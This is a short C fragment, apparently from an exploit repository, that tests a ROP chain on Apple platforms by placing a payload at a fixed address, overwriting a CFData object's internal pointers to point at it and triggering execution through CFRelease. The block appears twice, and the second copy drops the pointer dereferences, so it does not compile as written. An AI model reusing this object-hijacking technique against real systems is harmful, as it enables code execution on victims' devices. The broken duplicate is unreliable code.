ox1111/LOCAL_EXP.c

## LOCAL_EXP.c
//#define LOCAL_EXP
#ifdef LOCAL_EXP
    printf("Testing ROP chain \n");
    vm_address_t payload =0x118800000;
    kern_return_t kr = vm_allocate(mach_task_self(),&payload,payload_size,0);
    CHECK_MACH_ERR(kr,"vm_allocate()");
    memcpy((void*)payload, main_payload,payload_size);

    char *buf = malloc(1000);
    memset(buf,0xcc,1000);
    CFDataRef Data = CFDataCreate(NULL,(const UInt8 *)buf,1000);
    *(uint64_t*)Data = payload;
    *(uint64_t*)((uint8_t*)Data + 0x20) =payload_address + 0x200;

    CFRelease(Data);
    exit(0);
#endif
	//#define LOCAL_EXP
	#ifdef LOCAL_EXP
	printf("Testing ROP chain \n");
	vm_address_t payload =0x118800000;
	kern_return_t kr = vm_allocate(mach_task_self(),&payload,payload_size,0);
	CHECK_MACH_ERR(kr,"vm_allocate()");
	memcpy((void*)payload, main_payload,payload_size);

	char *buf = malloc(1000);
	memset(buf,0xcc,1000);
	CFDataRef Data = CFDataCreate(NULL,(const UInt8 *)buf,1000);
	(uint64_t)Data = payload;
	(uint64_t)((uint8_t*)Data + 0x20) =payload_address + 0x200;

	CFRelease(Data);
	exit(0);
	#endif